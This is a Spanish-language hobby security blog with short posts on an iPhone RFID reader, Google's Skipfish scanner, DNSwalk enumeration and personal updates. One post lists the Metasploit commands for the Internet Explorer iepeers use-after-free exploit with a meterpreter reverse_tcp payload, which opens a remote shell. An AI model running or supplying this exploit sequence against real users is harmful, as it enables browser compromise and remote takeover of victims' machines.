iPhone RFID Reader - Ojala pudiera tener uno xD

The idea behind this project is to see what the iPhone's serial is capable of and to try and have a little fun with RFID along the way. This reader works with the low frequency (125Khz) tags but I have a half working version for MiFARE Hi-Frequency as well. You can read about the details here.

Thanks go out to Netinfinity, the creator of Ubuntu Pentest Edition for referring this video to us.

iPhone RFID Reader from Benjamin Blundell on Vimeo.

fuente: Securitytube

Skipfish, escaner de google

Google, esa empresa que todos conocemos y que tarde o temprano odiaremos, acaba de anunciar un nuevo producto llamado Skipfish, nada mas y nada menos que un escaner de seguridad para aplicaciones web totalmente gratuito y de código abierto.

Segun Google Skipfish no solo es mas rápido que cualquier otra herramienta de su tipo, sino que ademas tiene menos “falsos positivos” y su interfaz es mucho mas sencilla que las demás.

Aunque no cumple con los estándares publicados por el Consorcio de seguridad de aplicaciones Web para los escaners de seguridad en aplicaciones web, es una buena herramienta para tener en cuenta a la hora de realizar nuestros test.

Descargar Skipfish

I sorry

Holas! bueno les comento...
ya entré al colegio y eso me tiene los tiempos mas limitados
pero aun así seguiré con el blog publicando al rededor de 2
a 3 articulos por fin de semana(considerando el viernes)

Espero que sigan leyendo el blog y eso :D

bye!

[Metasploit] ie_iepeers_pointer

> use exploit/windows/browser/ie_iepeers_pointer
> set PAYLOAD windows/meterpreter/reverse_tcp
> set SRVHOST
> set SRVPORT (80)
> set LHOST
> set URIpath test.html
> exploit

Internet Explorer iepeers.dll use-after-free - Demo from Chris John Riley on Vimeo.

Ni si, ni no...

Bueno...Ultimamente como quisas mas de alguno se a dado cuenta... la web habia estado off
y era porque estaba con todo el asunto de renovacion de dominio, etc...

Ahora entré a la escuela asi que lo mas probable que el fuido de temas que publicaba acá
sea menor ahora pero no significa que deje el blog a un lado :)

y eso...

les dejo un documento de Esteganografía muy bueno que encontré en dragonjar :)

AQUI

Bye!

Torpedo recomienda: Linux+ - Seguridad y Ethical Hacking!

Todabia no la termino de leer pero en lo que llevo está bueno :)
Descargar acá!

DNSwalk con Backtrack4

Holas!
El día de hoy les traigo esta tool llamada DNSwalk :).
Antes que todo para los que no tengan o no usen el Backtrack4, acá les dejo el link de descarga:
AQUI
o para los que usen Ubuntu:
$ sudo apt-get install dnswalk

Ruta: /pentest/enumeration/dns/dnswalk

Opciones:

-r Recursively descend subdomains of domain
-i Suppress check for invalid characters in a domain name.
-a turn on warning of duplicate A records.
-d Debugging
-m Check only if the domain has been modified. (Useful only if dnswalk has been run previously.)
-F Enable "facist" checking. (See man page)
-l Check lame delegations

Uso:

# ./dnswalk . > logfile.txt

Ejemplo:

# ./dnswalk -framd webvictima.com. > resultado.txt

Ojo: Después de la url de la Web va un . (punto).

Video: